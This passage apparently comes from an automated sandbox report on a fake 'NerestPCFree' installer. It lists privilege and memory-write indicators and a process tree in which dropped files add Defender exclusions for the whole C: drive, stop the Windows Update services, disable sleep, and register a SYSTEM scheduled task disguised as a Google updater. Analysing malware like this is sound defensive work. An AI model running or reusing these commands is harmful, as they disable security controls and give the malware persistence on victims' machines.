twain32.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 856 powershell.exe Token: SeDebugPrivilege 3340 dialer.exe Token: SeShutdownPrivilege 212 powercfg.exe Token: SeCreatePagefilePrivilege 212 powercfg.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeShutdownPrivilege 4832 powercfg.exe Token: SeCreatePagefilePrivilege 4832 powercfg.exe Token: SeShutdownPrivilege 448 powercfg.exe Token: SeCreatePagefilePrivilege 448 powercfg.exe Token: SeShutdownPrivilege 4764 powercfg.exe Token: SeCreatePagefilePrivilege 4764 powercfg.exe Token: SeIncreaseQuotaPrivilege 2940 powershell.exe Token: SeSecurityPrivilege 2940 powershell.exe Token: SeTakeOwnershipPrivilege 2940 powershell.exe Token: SeLoadDriverPrivilege 2940 powershell.exe Token: SeSystemProfilePrivilege 2940 powershell.exe Token: SeSystemtimePrivilege 2940 powershell.exe Token: SeProfSingleProcessPrivilege 2940 powershell.exe Token: SeIncBasePriorityPrivilege 2940 powershell.exe Token: SeCreatePagefilePrivilege 2940 powershell.exe Token: SeBackupPrivilege 2940 powershell.exe Token: SeRestorePrivilege 2940 powershell.exe Token: SeShutdownPrivilege 2940 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeSystemEnvironmentPrivilege 2940 powershell.exe Token: SeRemoteShutdownPrivilege 2940 powershell.exe Token: SeUndockPrivilege 2940 powershell.exe Token: SeManageVolumePrivilege 2940 powershell.exe Token: 33 2940 powershell.exe Token: 34 2940 powershell.exe Token: 35 2940 powershell.exe Token: 36 2940 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1972 svchost.exe Token: SeIncreaseQuotaPrivilege 1972 svchost.exe Token: SeSecurityPrivilege 1972 svchost.exe Token: SeTakeOwnershipPrivilege 1972 svchost.exe Token: SeLoadDriverPrivilege 1972 svchost.exe Token: SeSystemtimePrivilege 1972 svchost.exe Token: SeBackupPrivilege 1972 svchost.exe Token: SeRestorePrivilege 1972 svchost.exe Token: SeShutdownPrivilege 1972 svchost.exe Token: SeSystemEnvironmentPrivilege 1972 svchost.exe Token: SeUndockPrivilege 1972 svchost.exe Token: SeManageVolumePrivilege 1972 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1972 svchost.exe Token: SeIncreaseQuotaPrivilege 1972 svchost.exe Token: SeSecurityPrivilege 1972 svchost.exe Token: SeTakeOwnershipPrivilege 1972 svchost.exe Token: SeLoadDriverPrivilege 1972 svchost.exe Token: SeSystemtimePrivilege 1972 svchost.exe Token: SeBackupPrivilege 1972 svchost.exe Token: SeRestorePrivilege 1972 svchost.exe Token: SeShutdownPrivilege 1972 svchost.exe Token: SeSystemEnvironmentPrivilege 1972 svchost.exe Token: SeUndockPrivilege 1972 svchost.exe Token: SeManageVolumePrivilege 1972 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1972 svchost.exe Token: SeIncreaseQuotaPrivilege 1972 svchost.exe Token: SeSecurityPrivilege 1972 svchost.exe Token: SeTakeOwnershipPrivilege 1972 svchost.exe Token: SeLoadDriverPrivilege 1972 svchost.exe Token: SeSystemtimePrivilege 1972 svchost.exe Token: SeBackupPrivilege 1972 svchost.exe Token: SeRestorePrivilege 1972 svchost.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3988 Conhost.exe 1664 Conhost.exe 4908 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4868 wrote to memory of 848 4868 NerestPCFree 0.31.1.exe 84 PID 4868 wrote to memory of 848 4868 NerestPCFree 0.31.1.exe 84 PID 4868 wrote to memory of 848 4868 NerestPCFree 0.31.1.exe 84 PID 4868 wrote to memory of 1184 4868 NerestPCFree 0.31.1.exe 85 PID 4868 wrote to memory of 1184 4868 NerestPCFree 0.31.1.exe 85 PID 848 wrote to memory of 4968 848 MpDefenderCoreService.exe 86 PID 848 wrote to memory of 4968 848 MpDefenderCoreService.exe 86 PID 848 wrote to memory of 4968 848 MpDefenderCoreService.exe 86 PID 704 wrote to memory of 3840 704 cmd.exe 91 PID 704 wrote to memory of 3840 704 cmd.exe 91 PID 704 wrote to memory of 3216 704 cmd.exe 92 PID 704 wrote to memory of 3216 704 cmd.exe 92 PID 704 wrote to memory of 3596 704 cmd.exe 93 PID 704 wrote to memory of 3596 704 cmd.exe 93 PID 704 wrote to memory of 3236 704 cmd.exe 94 PID 704 wrote to memory of 3236 704 cmd.exe 94 PID 704 wrote to memory of 5060 704 cmd.exe 95 PID 704 wrote to memory of 5060 704 cmd.exe 95 PID 1184 wrote to memory of 3340 1184 twain32.exe 98 PID 3588 wrote to memory of 212 3588 cmd.exe 101 PID 3588 wrote to memory of 212 3588 cmd.exe 101 PID 3588 wrote to memory of 4832 3588 cmd.exe 102 PID 3588 wrote to memory of 4832 3588 cmd.exe 102 PID 3340 wrote to memory of 612 3340 dialer.exe 5 PID 3340 wrote to memory of 680 3340 dialer.exe 7 PID 3340 wrote to memory of 964 3340 dialer.exe 12 PID 3340 wrote to memory of 376 3340 dialer.exe 13 PID 3340 wrote to memory of 428 3340 dialer.exe 14 PID 680 wrote to memory of 2780 680 lsass.exe 47 PID 3588 wrote to memory of 448 3588 cmd.exe 103 PID 3588 wrote to memory of 448 3588 cmd.exe 103 PID 3340 wrote to memory of 960 3340 dialer.exe 15 PID 3340 wrote to memory of 1112 3340 dialer.exe 17 PID 3340 wrote to memory of 1144 3340 dialer.exe 18 PID 3340 wrote to memory of 1164 3340 dialer.exe 19 PID 3340 wrote to memory of 1232 3340 dialer.exe 20 PID 3340 wrote to memory of 1280 3340 dialer.exe 21 PID 3588 wrote to memory of 4764 3588 cmd.exe 104 PID 3588 wrote to memory of 4764 3588 cmd.exe 104 PID 680 wrote to memory of 2780 680 lsass.exe 47 PID 3340 wrote to memory of 1344 3340 dialer.exe 22 PID 3340 wrote to memory of 1364 3340 dialer.exe 23 PID 3340 wrote to memory of 1452 3340 dialer.exe 24 PID 3340 wrote to memory of 1492 3340 dialer.exe 25 PID 3340 wrote to memory of 1536 3340 dialer.exe 26 PID 3340 wrote to memory of 1572 3340 dialer.exe 27 PID 3340 wrote to memory of 1680 3340 dialer.exe 28 PID 3340 wrote to memory of 1700 3340 dialer.exe 29 PID 3340 wrote to memory of 1760 3340 dialer.exe 30 PID 3340 wrote to memory of 1796 3340 dialer.exe 31 PID 3340 wrote to memory of 1936 3340 dialer.exe 32 PID 3340 wrote to memory of 1972 3340 dialer.exe 33 PID 3340 wrote to memory of 2004 3340 dialer.exe 34 PID 3340 wrote to memory of 2016 3340 dialer.exe 35 PID 3340 wrote to memory of 1968 3340 dialer.exe 36 PID 3340 wrote to memory of 2072 3340 dialer.exe 37 PID 3340 wrote to memory of 2168 3340 dialer.exe 38 PID 3340 wrote to memory of 2244 3340 dialer.exe 40 PID 3340 wrote to memory of 2352 3340 dialer.exe 41 PID 3340 wrote to memory of 2524 3340 dialer.exe 42 PID 3340 wrote to memory of 2532 3340 dialer.exe 43 PID 3340 wrote to memory of 2668 3340 dialer.exe 44 PID 3340 wrote to memory of 2680 3340 dialer.exe 45 PID 3340 wrote to memory of 2728 3340 dialer.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:376
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1112 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2888
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2392 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2776
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1164
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1452
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2668
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2072
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2728
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2988
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3388
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3396
-
C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\fontwin\rjeG9jpaqkoGYbXQiCixJVHPtViWeFHmB5.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\fontwin\SCfgtLybPKjlpPh39WWFnP7oUkboktfnsRDnMjyFOdFfzldEyFoe.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:5032 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:3988
-
-
C:\fontwin\MsServerHost.exe"C:\fontwin/MsServerHost.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
PID:3104 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qgnjarao\qgnjarao.cmdline"7⤵
- Drops file in System32 directory
PID:1728 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:1664
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES31B9.tmp" "c:\Windows\System32\CSCD53789BDBD44C09F265DD55BD213.TMP"8⤵PID:3508
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3340 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:368
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5012 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:856
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3844 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2376
-
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3844" "2184" "2104" "2188" "0" "0" "2192" "0" "0" "0" "0" "0"8⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5468
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1872 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1744
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2328
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2576 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3532
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2576 -s 16728⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:624
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:216 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3960
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3132 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4328
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3132 -s 19648⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1188
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:392 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2344
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2920
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1964 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4784
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1384
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\encapsulation\upfc.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4896 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4848
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\fontdrvhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4952 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2516
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\SppExtComObj.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1488 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2544
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4460 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1152
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1956 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3484
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1788 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2372
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1788 -s 18208⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hEQSAna9Iq.bat"7⤵PID:3036
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:4908
-
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5516
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3640
-
-
C:\Recovery\WindowsRE\fontdrvhost.exe"C:\Recovery\WindowsRE\fontdrvhost.exe"8⤵
- Executes dropped EXE
PID:1912
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\twain32.exe"C:\Users\Admin\AppData\Local\Temp\twain32.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1184
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3840
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3216
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3596
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3236
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5060
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:184
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:880
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1612
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4824 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4164
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1668
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3828
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3284
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4200
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4268
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3148
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:1632 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:464
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:2428
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:5052
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
